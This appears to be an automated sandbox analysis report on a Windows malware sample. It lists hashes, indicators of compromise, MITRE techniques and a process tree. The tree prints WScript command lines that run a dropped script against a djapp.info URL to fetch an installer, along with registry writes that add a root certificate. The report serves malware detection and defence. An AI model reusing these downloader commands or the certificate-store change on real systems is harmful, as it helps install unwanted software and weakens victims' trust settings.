abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87

General

Target

abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe
Size

184KB
MD5

4e1fd28fed3fde03c9c451c3800b22c2
SHA1

25236ec5dde27fe08041d33a868f088c0ca88088
SHA256

abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87
SHA512

ba33f7281b0c8132533de8a1ae3f95e3d37330eb228927d5dd2f3ae3532c04a85f2ec64470d3a48020def1e72b18b27fc1c29ba0fafb21ab02b9e5acb1b09792
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Vc:/7BSH8zUB+nGESaaRvoB7FJNndnMc

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 15 IoCs

flow	pid	Process
3	764	WScript.exe
6	764	WScript.exe
7	108	WScript.exe
9	108	WScript.exe
13	108	WScript.exe
14	108	WScript.exe
16	108	WScript.exe
18	108	WScript.exe
20	108	WScript.exe
21	1084	WScript.exe
23	1084	WScript.exe
24	1416	WScript.exe
26	1416	WScript.exe
27	1056	WScript.exe
29	1056	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1488	1144	WerFault.exe	12

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1144 wrote to memory of 764	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	28
PID 1144 wrote to memory of 764	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	28
PID 1144 wrote to memory of 764	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	28
PID 1144 wrote to memory of 764	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	28
PID 1144 wrote to memory of 108	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	31
PID 1144 wrote to memory of 108	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	31
PID 1144 wrote to memory of 108	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	31
PID 1144 wrote to memory of 108	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	31
PID 1144 wrote to memory of 1084	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	33
PID 1144 wrote to memory of 1084	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	33
PID 1144 wrote to memory of 1084	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	33
PID 1144 wrote to memory of 1084	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	33
PID 1144 wrote to memory of 1416	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	34
PID 1144 wrote to memory of 1416	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	34
PID 1144 wrote to memory of 1416	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	34
PID 1144 wrote to memory of 1416	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	34
PID 1144 wrote to memory of 1056	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	35
PID 1144 wrote to memory of 1056	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	35
PID 1144 wrote to memory of 1056	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	35
PID 1144 wrote to memory of 1056	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	35
PID 1144 wrote to memory of 1488	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	36
PID 1144 wrote to memory of 1488	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	36
PID 1144 wrote to memory of 1488	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	36
PID 1144 wrote to memory of 1488	1144	abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe	36

C:\Users\Admin\AppData\Local\Temp\abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe
"C:\Users\Admin\AppData\Local\Temp\abec408981040cde903a16402592414283a4f1c20ccc08c3d994220ac1b3fc87.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1144
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82A8.js" http://www.djapp.info/?domain=ATkJfxClJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf82A8.exe
  2⤵
  - Blocklisted process makes network request
  PID:764
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82A8.js" http://www.djapp.info/?domain=ATkJfxClJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf82A8.exe
  2⤵
  - Blocklisted process makes network request
  - Modifies system certificate store
  PID:108
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82A8.js" http://www.djapp.info/?domain=ATkJfxClJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf82A8.exe
  2⤵
  - Blocklisted process makes network request
  PID:1084
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82A8.js" http://www.djapp.info/?domain=ATkJfxClJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf82A8.exe
  2⤵
  - Blocklisted process makes network request
  PID:1416
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82A8.js" http://www.djapp.info/?domain=ATkJfxClJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf82A8.exe
  2⤵
  - Blocklisted process makes network request
  PID:1056
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 548
  2⤵
  - Program crash
  PID:1488

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fuf82A8.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CD3PK2PA.txt

Filesize
100B

MD5
44060714e30459a8ead9efcf75f1f50b

SHA1
e7deac3624398f4fe9e7de2b6ef99c8ff667c322

SHA256
1133cae9d465484817eb7c7bb43c30e91218e21c95acde74b3457194c7508c11

SHA512
6111f94ef4889078a468f7f64154652c10a50a9431800579d35a0f37e807355740a472ad0b5de9868b06229a0729c62aaa1ec40b8db8fde2d612e36c3167bf30

Download Submit
memory/1144-54-0x0000000075F01000-0x0000000075F03000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing